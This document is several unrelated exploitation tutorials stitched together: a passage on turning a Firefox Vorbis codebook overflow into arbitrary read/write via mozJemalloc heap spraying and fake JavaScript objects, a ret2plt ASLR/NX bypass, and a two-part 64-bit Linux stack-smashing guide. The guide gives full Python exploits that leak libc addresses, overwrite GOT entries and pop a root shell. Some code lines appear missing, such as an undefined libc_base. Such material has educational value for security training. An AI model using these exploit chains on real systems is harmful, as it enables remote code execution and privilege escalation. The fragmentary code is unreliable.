After read some source , I found “a” was initialization in below code：

/* alloc pcm passback storage */
vb->pcmend=ci->blocksizes[vb->W];
vb->pcm=_vorbis_block_alloc(vb,sizeof(*vb->pcm)*vi->channels);
for(i=0;ichannels;i++)
vb->pcm[i]=_vorbis_block_alloc(vb,vb->pcmend*sizeof(*vb->pcm[i]));

The “vb->pcm[i]” will be pass into vulnerable function as “a”, and it’s memory chunk was alloc by _vorbis_block_alloc with size equal to vb->pcmend*sizeof(*vb->pcm[i]).
And vb->pcmend come from ci->blocksizes[vb->W], ci->blocksizes was defined in Vorbis Identification Header.
So we can control the size of memory chunk alloc for “a”.
Digging deep into _vorbis_block_alloc, we can found this call chain _vorbis_block_alloc -> _ogg_malloc -> CountingMalloc::Malloc -> arena_t::Malloc, so the memory chunk of “a” was lie on mozJemalloc heap.

4.3. Buffer – t

After read some source code , I found book->valuelist get its value from here：

c->valuelist=_book_unquantize(s,n,sortindex);

And the logic of _book_unquantize can be show as follow:

float *_book_unquantize(const static_codebook *b, int n, int *sparsemap)
{
long j, k, count = 0;
if (b->maptype == 1 || b->maptype == 2)
{
int quantvals;
float mindel = _float32_unpack(b->q_min);
float delta = _float32_unpack(b->q_delta);
float *r = _ogg_calloc(n * b->dim, sizeof(*r));

switch (b->maptype)
{
case 1:

quantvals=_book_maptype1_quantvals(b);

// do some math work

break;
case 2:

float val=b->quantlist[j*b->dim+k];

// do some math work

break;
}

return (r);
}
return (NULL);
}

So book->valuelist was the data decode from corresponding CodeBook’s VQ data.
It was lie on mozJemalloc heap too.

4.4. Cola Time

So now we can see, when the vulnerability was triggered：

• a
• lie on mozJemalloc heap;
• size controllable.
• t
• lie on mozJemalloc heap too;
• content controllable.
• book->dim
• content controllable.

Combine all thing above, we can do a write operation in mozJemalloc heap with a controllable offset and content.
But what about size controllable? Can this work for our exploit? Let’s see how mozJemalloc work.

5. mozJemalloc

mozJemalloc is a heap manager Mozilla develop base on Jemalloc.
Following was some global variables can show you some information about mozJemalloc.

• gArenas
• mDefaultArena
• mArenas
• mPrivateArenas
• gChunkBySize
• gChunkRTress

In mozJemalloc, memory will be divide into Chunks, and those chunk will be attach to different Arena. Arena will manage chunk. User alloc memory chunk must be inside one of the chunks. In mozJemalloc, we call user alloc memory chunk as region.
And Chunk will be divide into run with different size.Each run will bookkeeping region status inside it through a bitmap structure.

5.1. Arena

In mozJemalloc, each Arena will be assigned with a id. When allocator need to alloc a memory chunk, it can use id to get corresponding Arena.
There was a structure call mBin inside Arena. It was a array, each element of it wat a arena_bin_t object, and this object manage all same size memory chunk in this Arena. Memory chunk size from 0x10 to 0x800 will be managed by mBin.
Run used by mBin can not be guarantee to be contiguous, so mBin using a red-black-tree to manage Run.

5.2. Run

The first one region inside a Run will be use to save Run manage information, and rest of the region can be use when alloc. All region in same Run have same size.
When alloc region from a Run, it will return first No-in-use region close to Run header.

5.3. Arena Partition

This now code branch in mozilla-central, all JavaScript memory alloc or free will pass moz_arena_ prefix function. And this function will only use Arena which id was 1.
In mozJemalloc, Arena can be a PrivateArena or not a PrivateArena. Arena with id 1 will be a PrivateArena. So it means that ogg buffer will not be in the same Arena with JavaScript Object.
In this situation, we can say that JavaScript Arena was isolated with other Arenas.
But in vulnerable Windows Firefox 59.0 does not have a PrivateArena, so that we can using JavaScript Object to perform a Heap feng shui to run a exploit.
First I was debug in a Linux opt+debug build Firefox, as Arena partition, it was hard to found a way to write a exploit, so far I can only get a info leak situation in Linux.

6. Exploit

In the section, I will show how to build a exploit base on this vulnerability.

6.1. Build Ogg file

First of all, we need to build a ogg file which can trigger this vulnerability, some of PoC ogg file data as follow：

Pic.4 PoC Ogg file partial data
We can see codebook->dim equal to 0x48。

6.2. Heap Spary

First we alloc a lot JavaScript avrray, it will exhaust all useable memory region in mBin, and therefore mozJemalloc have to map new memory and divide it into Run for mBin.
Then we interleaved free those array, therefore there will be many hole inside mBin, but as we can never know the original layout of mBin, and there can be other object or thread using mBin when we free array, the hole may not be interleaved.
If the hole is not interleaved, our ogg buffer may be malloc in a contiguous hole, in this situation, we can not control too much off data.
So to avoid above situation, after interleaved free, we should do some compensate to mBin so that we can malloc ogg buffer in a hole before a array.

6.3. Modify Array Length

After Heap Spary，we can use _ogg_malloc to malloc region in mozJemalloc heap.
So we can force a memory layout as follow：

|———————contiguous memory —————————|
[ hole ][ Array ][ ogg_malloc_buffer ][ Array ][ hole ]

And we trigger a out-of-bound write operation, we can modify one of the array’s length. So that we have a array object in mozJemalloc which can read out-of-bound.
Then we alloc many ArrayBuffer Object in mozJemalloc. Memory layout turn into following situation:

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents ]

In this situation, we can use Array_length_modified to read/write ArrayBuffer_contents.
Finally memory will like this：

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents_modified ]

6.4. Cola time again

Now we control those object and we can do：

• Array_length_modified
• Out-of-bound write
• ArrayBuffer_contents_modified
• In-bound write

If we try to leak memory data from Array_length_modified, due to SpiderMonkey use tagged value, we will read “NaN” from memory.
But if we use Array_length_modified to write something in ArrayBuffer_contents_modified, and read it from ArrayBuffer_contents_modified. We can leak pointer of Javascript Object from memory.

6.5. Fake JSObject

We can fake a JSObject on memory by leak some pointer and write it into JavasScript Object. And we can write to a address through this Fake Object. (turn off baselineJIT will help you to see what is going on and following contents will base on baselineJIT disable)

Pic.5 Fake JavaScript Object

If we alloc two arraybuffer with same size, they will in contiguous memory inside JS::Nursery heap. Memory layout will be like follow

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

And we can change first arraybuffer’s metadata to make SpiderMonkey think it cover second arraybuffer by use fake object trick.

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

We can read/write to arbitrarily memory now.
After this, all you need was a ROP chain to get Firefox to your shellcode.

6.6. Pop Calc?

Finally we achieve our shellcode, process context as follow：

Pic.6 achieve shellcode
Corresponding memory chunk information as follow：

But Firefox release have enable Sandbox as default, so if you try to pop calc through CreateProcess, Sandbox will block it.

Bypass ASLR+NX Part 1

Hi guys today i will explain how to bypass ASLR and NX mitigation technique if you dont have any knowledge about ASLR and NX you can read it in Above link i will explain it but not in depth

ASLR:Address Space Layout randomization : it’s mitigation to technique to prevent exploitation of memory by make Address randomize not fixed as we saw in basic buffer overflow exploit it need to but start of buffer in EIP and Redirect execution to execute your shellcode but when it’s random it will make it hard to guess that start of buffer random it’s only in shared library address we found ASLR in stack address ,Heap Address.

NX: Non-Executable it;s another mitigation use to prevent memory from execute any machine code(shellcode) as we saw in basic buffer overflow  you  put shellcode in stack and redirect EIP to begin of buffer to execute it but this will not work here this mitigation could be bypass by Ret2libc exploit technique use function inside binary pass it to stack and aslo they are another way   depend on gadgets inside binary or shared library this technique is ROP Return Oriented Programming i will  make separate article .

After we get little info about ASLR and NX now it’s time to see how we can bypass it, to bypass ASLR there are many ways like Ret2PLT use Procedural Linkage Table contains a stub code for each global function. A call instruction in text segment doesnt call the function (‘function’) directly instead it calls the stub code(func@PLT) why we use Return in PLT because it’not randomized  it’s address know before execution itself  another technique is overwrite GOT and  brute-forcing this technique use when the address partial randomized like 2 or 3 bytes just randomized .

in this article i will explain technique combine Ret2plt and some ROP gadgets and Ret2libc see let divided it
first find Ret2PLT

vulnerable code

we compile it with following Flags

now let check ASLR it’s enable it

as you see in above image libc it’s randomized but it could be brute-force it

now let open file in gdb

now it’s clear NX was enable it now let fuzzing binary .

we create pattern and we going to pass to  binary  to detect where overflow occur

now we can see they are pattern in EIP we use another tool to find where overflow occurred.

1028 to overwrite EBP if we add 4bytes we going control EIP and we can redirect our execution.

now we have control EIP .

ok after we do basic overflow steps now we need way let us to bypass ASLR+NX .

first find functions PLT in binary file.

we find strcpy and system PLT now how we going to build our exploit depend on two methods just.
second we must find writable section in binary file to fill it and use system like to we did in traditional Ret2libc.

first think in .bss section is use by compilers and linkers for the  part  of the data segment containing static allocated variables that are not initialized .

after that we will use strcpy to write string in .bss address but what address ?
ok let back to function we find it in PLT strcpy as we know we will be use to write string and system to execute command but will can;t find /bin/sh in binary file we have another way is to look at binary.

now we have string address  it’s time to combine all pieces we found it.

1-use strcpy to copy from SRC to DEST SRC in this case it’s our string «sh» and DEST   it’s our writable area «.bss» but we need to chain two method strcpy and system we look for gadgets depend on our parameters in this case just we need pop pop ret.

we chose 0x080484ba does’t matter  register name  we need just two pop .
2-after we write string  we use system like we use it in Ret2libc but in this case «/bin/sh» will be .bss address.

strcpy+ppr+.bss+s
strcpy+ppr+.bss+1+h
system+dump+.bss

Final Exploit

we got Shell somtime you need to chain many technique to get final exploit to bypass more than one mitigation.

64-bit Linux stack smashing tutorial: Part 3

t’s been almost a year since I posted part 2, and since then, I’ve received requests to write a follow up on how to bypass ASLR. There are quite a few ways to do this, and rather than go over all of them, I’ve picked one interesting technique that I’ll describe here. It involves leaking a library function’s address from the GOT, and using it to determine the addresses of other functions in libc that we can return to.

Setup

The setup is identical to what I was using in part 1 and part 2. No new tools required.

Here’s the source code for the binary we’ll be exploiting:

``````/* Compile: gcc -fno-stack-protector leak.c -o leak          */
/* Enable ASLR: echo 2 > /proc/sys/kernel/randomize_va_space */

#include <stdio.h>
#include <string.h>
#include <unistd.h>

void helper() {
asm("pop %rdi; pop %rsi; pop %rdx; ret");
}

int vuln() {
char buf[150];
ssize_t b;
memset(buf, 0, 150);
printf("Enter input: ");

printf("Recv: ");
write(1, buf, b);
return 0;
}

int main(int argc, char *argv[]){
setbuf(stdout, 0);
vuln();
return 0;
}
``````

The vulnerability is in the vuln() function, where read() is allowed to write 400 bytes into a 150 byte buffer. With ASLR on, we can’t just return to system() as its address will be different each time the program runs. The high level solution to exploiting this is as follows:

1. Leak the address of a library function in the GOT. In this case, we’ll leak memset()’s GOT entry, which will give us memset()’s address.
2. Get libc’s base address so we can calculate the address of other library functions. libc’s base address is the difference between memset()’s address, and memset()’s offset from libc.so.6.
3. A library function’s address can be obtained by adding its offset from libc.so.6 to libc’s base address. In this case, we’ll get system()’s address.
4. Overwrite a GOT entry’s address with system()’s address, so that when we call that function, it calls system() instead.

You should have a bit of an understanding on how shared libraries work in Linux. In a nutshell, the loader will initially point the GOT entry for a library function to some code that will do a slow lookup of the function address. Once it finds it, it overwrites its GOT entry with the address of the library function so it doesn’t need to do the lookup again. That means the second time a library function is called, the GOT entry will point to that function’s address. That’s what we want to leak. For a deeper understanding of how this all works, I refer you to PLT and GOT — the key to code sharing and dynamic libraries.

Let’s try to leak memset()’s address. We’ll run the binary under socat so we can communicate with it over port 2323:

``````# socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./leak
``````

Grab memset()’s entry in the GOT:

``````# objdump -R leak | grep memset
0000000000601030 R_X86_64_JUMP_SLOT  memset
``````

Let’s set a breakpoint at the call to memset() in vuln(). If we disassemble vuln(), we see that the call happens at 0x4006c6. So add a breakpoint in ~/.gdbinit:

``````# echo "br *0x4006c6" >> ~/.gdbinit
``````

Now let’s attach gdb to socat.

``````# gdb -q -p `pidof socat`
Breakpoint 1 at 0x4006c6
Attaching to process 10059
.
.
.
gdb-peda\$ c
Continuing.
``````

Hit “c” to continue execution. At this point, it’s waiting for us to connect, so we’ll fire up nc and connect to localhost on port 2323:

``````# nc localhost 2323
``````

Now check gdb, and it will have hit the breakpoint, right before memset() is called.

``````   0x4006c3 <vuln+28>:  mov    rdi,rax
=> 0x4006c6 <vuln+31>:  call   0x400570 <memset@plt>
0x4006cb <vuln+36>:  mov    edi,0x4007e4
``````

Since this is the first time memset() is being called, we expect that its GOT entry points to the slow lookup function.

``````gdb-peda\$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x0000000000400576
gdb-peda\$ x/5i 0x0000000000400576
0x400576 <memset@plt+6>:     push   0x3
0x40057b <memset@plt+11>:    jmp    0x400530
``````

Step over the call to memset() so that it executes, and examine its GOT entry again. This time it points to memset()’s address:

``````gdb-peda\$ x/gx 0x601030
0x601030 <memset@got.plt>:      0x00007f86f37335c0
gdb-peda\$ x/5i 0x00007f86f37335c0
0x7f86f37335c0 <memset>:     movd   xmm8,esi
0x7f86f37335c5 <memset+5>:   mov    rax,rdi
0x7f86f37335c8 <memset+8>:   punpcklbw xmm8,xmm8
0x7f86f37335cd <memset+13>:  punpcklwd xmm8,xmm8
0x7f86f37335d2 <memset+18>:  pshufd xmm8,xmm8,0x0
``````

If we can write memset()’s GOT entry back to us, we’ll receive it’s address of 0x00007f86f37335c0. We can do that by overwriting vuln()’s saved return pointer to setup a ret2plt; in this case, write@plt. Since we’re exploiting a 64-bit binary, we need to populate the RDI, RSI, and RDX registers with the arguments for write(). So we need to return to a ROP gadget that sets up these registers, and then we can return to write@plt.

I’ve created a helper function in the binary that contains a gadget that will pop three values off the stack into RDI, RSI, and RDX. If we disassemble helper(), we’ll see that the gadget starts at 0x4006a1. Here’s the start of our exploit:

``````#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", 0x8)          # number of bytes to write to stdout

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address
# which is the last 8 bytes in the reply

# keep socket open so gdb doesn't get a SIGTERM
while True:
s.recv(1024)
``````

Let’s see it in action:

``````# ./poc.py
Enter input:
Recv:
memset() is at 0x7f679978e5c0

``````

I recommend attaching gdb to socat as before and running poc.py. Step through the instructions so you can see what’s going on. After memset() is called, do a “`p memset`”, and compare that address with the leaked address you receive. If it’s identical, then you’ve successfully leaked memset()’s address.

Next we need to calculate libc’s base address in order to get the address of any library function, or even a gadget, in libc. First, we need to get memset()’s offset from libc.so.6. On my machine, libc.so.6 is at /lib/x86_64-linux-gnu/libc.so.6. You can find yours by using ldd:

``````# ldd leak
linux-vdso.so.1 =>  (0x00007ffd5affe000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff25c07d000)
/lib64/ld-linux-x86-64.so.2 (0x00005630d0961000)
``````

libc.so.6 contains the offsets of all the functions available to us in libc. To get memset()’s offset, we can use readelf:

``````# readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep memset
66: 00000000000a1de0   117 FUNC    GLOBAL DEFAULT   12 wmemset@@GLIBC_2.2.5
771: 000000000010c150    16 FUNC    GLOBAL DEFAULT   12 __wmemset_chk@@GLIBC_2.4
838: 000000000008c5c0   247 FUNC    GLOBAL DEFAULT   12 memset@@GLIBC_2.2.5
1383: 000000000008c5b0     9 FUNC    GLOBAL DEFAULT   12 __memset_chk@@GLIBC_2.3.4
``````

memset()’s offset is at 0x8c5c0. Subtracting this from the leaked memset()’s address will give us libc’s base address.

To find the address of any library function, we just do the reverse and add the function’s offset to libc’s base address. So to find system()’s address, we get its offset from libc.so.6, and add it to libc’s base address.

Here’s our modified exploit that leaks memset()’s address, calculates libc’s base address, and finds the address of system():

``````# ./poc.py
#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", 0x8)          # number of bytes to write to stdout

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address
# which is the last 8 bytes in the reply

print "libc base is", hex(libc_base)

# keep socket open so gdb doesn't get a SIGTERM
while True:
s.recv(1024)
``````

And here it is in action:

``````# ./poc.py
Enter input:
Recv:
memset() is at 0x7f9d206e45c0
libc base is 0x7f9d20658000
system() is at 0x7f9d2069e640

``````

Now that we can get any library function address, we can do a ret2libc to complete the exploit. We’ll overwrite memset()’s GOT entry with the address of system(), so that when we trigger a call to memset(), it will call system(“/bin/sh”) instead. Here’s what we need to do:

1. Overwrite memset()’s GOT entry with the address of system() using read@plt.
2. Write “/bin/sh” somewhere in memory using read@plt. We’ll use 0x601000 since it’s a writable location with a static address.
3. Set RDI to the location of “/bin/sh” and return to system().

Here’s the final exploit:

``````#!/usr/bin/env python

import telnetlib
from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_plt = 0x400570            # address of memset@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret
writeable  = 0x601000            # location to write "/bin/sh" to

# leak memset()'s libc address using write@plt
buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", 0x8)          # number of bytes to write to stdout

buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # stdin
buf += pack("<Q", memset_got)   # address to write to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin

buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # junk
buf += pack("<Q", writeable)    # location to write "/bin/sh" to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin

# payload for stage 3: set RDI to location of "/bin/sh", and call system()
buf += pack("<Q", pop3ret)      # pop rdi; ret
buf += pack("<Q", writeable)    # address of "/bin/sh"
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", memset_plt)   # return to memset@plt which is actually system() now

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address
# which is the last 8 bytes in the reply

print "libc base is", hex(libc_base)

# stage 2: send address of system() to overwrite memset()'s GOT entry

# stage 3: send "/bin/sh" to writable location
print "sending '/bin/sh'"
s.send("/bin/sh")

# get a shell
t = telnetlib.Telnet()
t.sock = s
t.interact()
``````

I’ve commented the code heavily, so hopefully that will explain what’s going on. If you’re still a bit confused, attach gdb to socat and step through the process. For good measure, let’s run the binary as the root user, and run the exploit as a non-priviledged user:

``````koji@pwnbox:/root/work\$ whoami
koji
koji@pwnbox:/root/work\$ ./poc.py
Enter input:
Recv:
memset() is at 0x7f57f50015c0
libc base is 0x7f57f4f75000
system() is at 0x7f57f4fbb640
+ sending '/bin/sh'
whoami
root
``````

Got a root shell and we bypassed ASLR, and NX!

We’ve looked at one way to bypass ASLR by leaking an address in the GOT. There are other ways to do it, and I refer you to the ASLR Smack & Laugh Reference for some interesting reading. Before I end off, you may have noticed that you need to have the correct version of libc to subtract an offset from the leaked address in order to get libc’s base address. If you don’t have access to the target’s version of libc, you can attempt to identify it using libc-database. Just pass it the leaked address and hopefully, it will identify the libc version on the target, which will allow you to get the correct offset of a function.

64-bit Linux stack smashing tutorial: Part 2

This is part 2 of my 64-bit Linux Stack Smashing tutorial. In part 1 we exploited a 64-bit binary using a classic stack overflow and learned that we can’t just blindly expect to overwrite RIP by spamming the buffer with bytes. We turned off ASLR, NX, and stack canaries in part 1 so we could focus on the exploitation rather than bypassing these security features. This time we’ll enable NX and look at how we can exploit the same binary using ret2libc.

Setup

The setup is identical to what I was using in part 1. We’ll also be making use of the following:

Ret2Libc

Here’s the same binary we exploited in part 1. The only difference is we’ll keep NX enabled which will prevent our previous exploit from working since the stack is now non-executable:

``````/* Compile: gcc -fno-stack-protector ret2libc.c -o ret2libc      */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space     */

#include <stdio.h>
#include <unistd.h>

int vuln() {
char buf[80];
int r;
printf("\nRead %d bytes. buf is %s\n", r, buf);
puts("No shell for you :(");
return 0;
}

int main(int argc, char *argv[]) {
printf("Try to exec /bin/sh");
vuln();
return 0;
}
``````

You can also grab the precompiled binary here.

In 32-bit binaries, a ret2libc attack involves setting up a fake stack frame so that the function calls a function in libc and passes it any parameters it needs. Typically this would be returning to system() and having it execute “/bin/sh”.

In 64-bit binaries, function parameters are passed in registers, therefore there’s no need to fake a stack frame. The first six parameters are passed in registers RDI, RSI, RDX, RCX, R8, and R9. Anything beyond that is passed in the stack. This means that before returning to our function of choice in libc, we need to make sure the registers are setup correctly with the parameters the function is expecting. This in turn leads us to having to use a bit of Return Oriented Programming (ROP). If you’re not familiar with ROP, don’t worry, we won’t be going into the crazy stuff.

We’ll start with a simple exploit that returns to system() and executes “/bin/sh”. We need a few things:

• A pointer to “/bin/sh”.
• Since the first function parameter needs to be in RDI, we need a ROP gadget that will copy the pointer to “/bin/sh” into RDI.

``````gdb-peda\$ start
.
.
.
gdb-peda\$ p system
\$1 = {<text variable, no debug info>} 0x7ffff7a5ac40 <system>
``````

We can just as easily search for a pointer to “/bin/sh”:

``````gdb-peda\$ find "/bin/sh"
Searching for '/bin/sh' in: None ranges
Found 3 results, display max 3 items:
ret2libc : 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
ret2libc : 0x6006ff --> 0x68732f6e69622f ('/bin/sh')
libc : 0x7ffff7b9209b --> 0x68732f6e69622f ('/bin/sh')
``````

The first two pointers are from the string in the binary that prints out “Try to exec /bin/sh”. The third is from libc itself, and in fact if you do have access to libc, then feel free to use it. In this case, we’ll go with the first one at 0x4006ff.

Now we need a gadget that copies 0x4006ff to RDI. We can search for one using ropper. Let’s see if we can find any instructions that use EDI or RDI:

``````koji@pwnbox:~/ret2libc\$ ropper --file ret2libc --search "% ?di"
=======

0x0000000000400520: mov edi, 0x601050; jmp rax;
0x000000000040051f: pop rbp; mov edi, 0x601050; jmp rax;
0x00000000004006a3: pop rdi; ret ;

``````

The third gadget that pops a value off the stack into RDI is perfect. We now have everything we need to construct our exploit:

``````#!/usr/bin/env python

from struct import *

buf = ""
buf += "A"*104                              # junk
buf += pack("<Q", 0x00000000004006a3)       # pop rdi; ret;
buf += pack("<Q", 0x4006ff)                 # pointer to "/bin/sh" gets popped into rdi
buf += pack("<Q", 0x7ffff7a5ac40)           # address of system()

f = open("in.txt", "w")
f.write(buf)
``````

This exploit will write our payload into in.txt which we can redirect into the binary within gdb. Let’s go over it quickly:

• Line 7: We overwrite RIP with the address of our ROP gadget so when vuln() returns, it executes pop rdi; ret.
• Line 8: This value is popped into RDI when pop rdi is executed. Once that’s done, RSP will be pointing to 0x7ffff7a5ac40; the address of system().
• Line 9: When ret executes after pop rdi, execution returns to system(). system() will look at RDI for the parameter it expects and execute it. In this case, it executes “/bin/sh”.

Let’s see it in action in gdb. We’ll set a breakpoint at vuln()’s return instruction:

``````gdb-peda\$ br *vuln+73
Breakpoint 1 at 0x40060f
``````

Now we’ll redirect the payload into the binary and it should hit our first breakpoint:

``````gdb-peda\$ r < in.txt
Try to exec /bin/sh
Read 128 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(
.
.
.
[-------------------------------------code-------------------------------------]
0x400604 <vuln+62>:  call   0x400480 <puts@plt>
0x400609 <vuln+67>:  mov    eax,0x0
0x40060e <vuln+72>:  leave
=> 0x40060f <vuln+73>:  ret
0x400610 <main>: push   rbp
0x400611 <main+1>:   mov    rbp,rsp
0x400614 <main+4>:   sub    rsp,0x10
0x400618 <main+8>:   mov    DWORD PTR [rbp-0x4],edi
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe508 --> 0x4006a3 (<__libc_csu_init+99>:    pop    rdi)
0008| 0x7fffffffe510 --> 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
0016| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0024| 0x7fffffffe520 --> 0x0
0032| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0040| 0x7fffffffe530 --> 0x0
0048| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0056| 0x7fffffffe540 --> 0x100000000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x000000000040060f in vuln ()
``````

Notice that RSP points to 0x4006a3 which is our ROP gadget. Step in and we’ll return to our gadget where we can now execute pop rdi.

``````gdb-peda\$ si
.
.
.
[-------------------------------------code-------------------------------------]
=> 0x4006a3 <__libc_csu_init+99>:   pop    rdi
0x4006a4 <__libc_csu_init+100>:  ret
0x4006a5:    data32 nop WORD PTR cs:[rax+rax*1+0x0]
0x4006b0 <__libc_csu_fini>:  repz ret
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe510 --> 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
0008| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0016| 0x7fffffffe520 --> 0x0
0024| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0032| 0x7fffffffe530 --> 0x0
0040| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0048| 0x7fffffffe540 --> 0x100000000
0056| 0x7fffffffe548 --> 0x400610 (<main>:  push   rbp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000004006a3 in __libc_csu_init ()
``````

Step in and RDI should now contain a pointer to “/bin/sh”:

``````gdb-peda\$ si
[----------------------------------registers-----------------------------------]
.
.
.
RDI: 0x4006ff --> 0x68732f6e69622f ('/bin/sh')
.
.
.
[-------------------------------------code-------------------------------------]
0x40069e <__libc_csu_init+94>:   pop    r13
0x4006a0 <__libc_csu_init+96>:   pop    r14
0x4006a2 <__libc_csu_init+98>:   pop    r15
=> 0x4006a4 <__libc_csu_init+100>:  ret
0x4006a5:    data32 nop WORD PTR cs:[rax+rax*1+0x0]
0x4006b0 <__libc_csu_fini>:  repz ret
0x4006b4 <_fini>:    sub    rsp,0x8
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe518 --> 0x7ffff7a5ac40 (<system>:  test   rdi,rdi)
0008| 0x7fffffffe520 --> 0x0
0016| 0x7fffffffe528 --> 0x7ffff7a37ec5 (<__libc_start_main+245>:   mov    edi,eax)
0024| 0x7fffffffe530 --> 0x0
0032| 0x7fffffffe538 --> 0x7fffffffe608 --> 0x7fffffffe827 ("/home/koji/ret2libc/ret2libc")
0040| 0x7fffffffe540 --> 0x100000000
0048| 0x7fffffffe548 --> 0x400610 (<main>:  push   rbp)
0056| 0x7fffffffe550 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000004006a4 in __libc_csu_init ()
``````

Now RIP points to ret and RSP points to the address of system(). Step in again and we should now be in system()

``````gdb-peda\$ si
.
.
.
[-------------------------------------code-------------------------------------]
0x7ffff7a5ac35 <cancel_handler+181>: pop    rbx
0x7ffff7a5ac36 <cancel_handler+182>: ret
0x7ffff7a5ac37:  nop    WORD PTR [rax+rax*1+0x0]
=> 0x7ffff7a5ac40 <system>: test   rdi,rdi
0x7ffff7a5ac43 <system+3>:   je     0x7ffff7a5ac50 <system+16>
0x7ffff7a5ac45 <system+5>:   jmp    0x7ffff7a5a770 <do_system>
0x7ffff7a5ac4a <system+10>:  nop    WORD PTR [rax+rax*1+0x0]
0x7ffff7a5ac50 <system+16>:  lea    rdi,[rip+0x13744c]        # 0x7ffff7b920a3
``````

At this point if we just continue execution we should see that “/bin/sh” is executed:

``````gdb-peda\$ c
[New process 11114]
process 11114 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
[New process 11115]
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
process 11115 is executing new program: /bin/dash
Error in re-setting breakpoint 1: No symbol table is loaded.  Use the "file" command.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
Error in re-setting breakpoint 1: No symbol "vuln" in current context.
[Inferior 3 (process 11115) exited normally]
Warning: not running or target is remote
``````

Perfect, it looks like our exploit works. Let’s try it and see if we can get a root shell. We’ll change ret2libc’s owner and permissions so that it’s SUID root:

``````koji@pwnbox:~/ret2libc\$ sudo chown root ret2libc
koji@pwnbox:~/ret2libc\$ sudo chmod 4755 ret2libc
``````

Now let’s execute our exploit much like we did in part 1:

``````koji@pwnbox:~/ret2libc\$ (cat in.txt ; cat) | ./ret2libc
Try to exec /bin/sh
Read 128 bytes. buf is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
No shell for you :(
whoami
root
``````

